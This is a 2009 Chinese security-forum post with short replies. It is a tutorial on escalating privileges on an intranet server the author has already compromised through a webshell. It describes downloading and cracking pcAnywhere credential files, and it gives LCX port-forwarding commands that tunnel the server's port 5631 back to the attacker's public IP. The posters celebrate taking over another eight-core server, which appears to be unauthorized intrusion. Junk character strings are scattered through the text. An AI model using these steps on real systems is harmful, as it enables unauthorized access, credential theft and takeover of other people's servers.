【3.A.S.T】网络安全爱好者 » 原创专区 » pcanywhere之内网提权

huar 发表于 2009-7-5 21:35

pcanywhere之内网提权

很多教程都是在外网直接连接的，像我这样的小菜没有这么好的命，我在用pcanywhere提权时问题总是多多，所以我今天做个在内网连接pcanywhere的简单教程。
4|sN,O^0g
F f5a&e,zS 提权方法：pcanywhere+LCX
d%]s-Q3AX5k
6A E$`;Pp`~6JM"`.Q 获得webshell的过程就不说了，该篇教程主要给新手讲下提权的思路。 b{iq#z X

r6`}/T#j/\'\7N^Qs 在shell里看了下，WScript.shell等重要的组件没有被禁用，首先在有可执行读写权限的目录，上传个cmd试下可以运行。
h9Fh(cePqI *t,}$zd }
[attach]1548[/attach]UD
w.t!tX`Hv
查看服务器开的端口时，发现服务器开了80、1433、5631等端口，并且服务器在内网。w ucs3b&Q*C

IaT_9|5m [attach]1549[/attach]
-[zR8FQNb4I` 呵呵```pcanywhere的端口为5631，既然该站点有pcanywhere，我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件，下载到本地计算机上破解，呵呵```账号密码出来了。&c0Sznx4HF;N-~-W

]!{+kE3Kd [attach]1550[/attach]
-r eX9]
j:LYj R+R Xhw` ,h^%RD B!u
[attach]1551[/attach][,pD-a0r8Ph
由于服务器在内网，那我们就要做端口转发，又要用到LCX啦``
1V]7z!OeoM6R,@cj'S
?+ud8jf y [attach]1552[/attach]
&n0El'o LyYI&Y LCX的用法再简单说下：
+U,GY!GQ
YuYB+k
服务器上运行：lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX（服务器ip） XXXX（服务器需要转发出去的端口）
5F2X
?Y4Q-n^;|*PJ 5]*Fl(|,Cuk$l
本地计算机上运行：lcx -listen XX(端口号) XXX（在自己机器上指定的端口）_6Atg@ j_*v8hW
Xk y5N+Z
由于我的机器也在内网，LCX 转发端口到本地必须用公网ip，所以我还需要在路由器上简单设置下。
g9P5yf y"H&N;? 顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``3Os1J"\vdYT
4n
p G$X!Lg
[attach]1553[/attach]T-p \:S ]s3g

nqoQ,{+h C [attach]1554[/attach].UI'h1Dt
呵呵``在连接的过程中出现个小问题，由于我用的是pcanyshell10.5的版本，在连接的时候提示版本过低，那我们就用12.0的版本试下。(o5o;Vcj1}]k

S5O/L/?r I}'T [attach]1555[/attach]gPd-F/u4FoN
!J-qo_QRB
[attach]1556[/attach]
iD{]?Q5l6J"l 我们本地连接试试，输入我们刚破解的账号密码
Nd y9[~2D eBad H2X-jpn
[attach]1557[/attach]
DGOg/OrW 呵呵``连接成功,服务器不错，又一个8核^︵^9qC'q'm&_

ApU y7Ey [attach]1558[/attach]V2l$}9qH3{Wp]
tz7~h}@1B(K
[attach]1559[/attach]

柔肠寸断 发表于 2009-7-5 21:37

不错不错。。。你的貌似一直都是内网服务器哈

huar 发表于 2009-7-5 21:41

哎。。。。运气不佳```老碰见内网的。。。。{m:m (46):m}

gassiori 发表于 2009-7-6 09:50

八核的哟{:Yem58:Y}

柔肠寸断 发表于 2009-12-15 15:36

顶起。。。。。。。。。

killadmin 发表于 2010-1-21 20:01

但是我反弹后连接总是不成功,试着转发5632,5631一起,还是不行.

查看完整版本: pcanywhere之内网提权